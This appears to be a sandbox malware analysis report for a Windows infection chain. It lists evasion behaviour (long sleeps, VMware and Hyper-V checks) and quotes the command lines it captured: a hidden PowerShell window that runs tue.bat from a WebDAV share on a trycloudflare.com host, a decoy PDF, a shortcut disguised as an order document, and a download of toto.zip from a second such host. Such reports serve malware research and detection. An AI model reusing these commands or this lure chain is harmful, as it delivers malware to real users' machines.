Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 1472			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3164			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2323			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7369			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1048	Thread sleep count: 3164 > 30			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5136	Thread sleep count: 269 > 30			Jump to behavior
Source: C:\Windows\System32\timeout.exe TID: 2424	Thread sleep count: 39 > 30			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4068	Thread sleep count: 2323 > 30			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4068	Thread sleep count: 7369 > 30			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2680	Thread sleep time: -7378697629483816s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1096	Thread sleep time: -1844674407370954s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Contains medium sleeps (>= 30s)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: cmd.exe, 0000001E.00000003.2318311250.0000025D62B3C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: rundll32.exe, 00000011.00000002.1551843850.000001EC8FB93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
Source: rundll32.exe, 00000016.00000002.1565812654.0000020B537B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
Source: cmd.exe, 0000001E.00000003.2318311250.0000025D62B3C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\G
Source: rundll32.exe, 0000001F.00000002.1961788980.0000020686564000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2407822609.0000013E4F8CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: rundll32.exe, 00000018.00000002.1742704031.0000028904A24000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK

Queries a list of all running processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat' analyze"			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat analyze			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LSBIHQFDVT.pdf"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 5			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"			Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -outfile 'c:\users\user\downloads\toto.zip' } catch { exit 1 }"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -outfile 'c:\users\user\downloads\toto.zip' } catch { exit 1 }"			Jump to behavior

Language, Device and Operating System Detection

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\conhost.exe	Queries volume information: \Device\Mup\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\DE\bestellung-DKM00392pdf.lnk VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior

Stealing of Sensitive Information

Opens network shares

Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\DE\			Jump to behavior
Source: C:\Windows\System32\conhost.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\DE\bestellung-DKM00392pdf.lnk			Jump to behavior
Source: C:\Windows\System32\conhost.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\DE			Jump to behavior
Source: C:\Windows\System32\conhost.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\DE\bestellung-DKM00392pdf.lnk			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\			Jump to behavior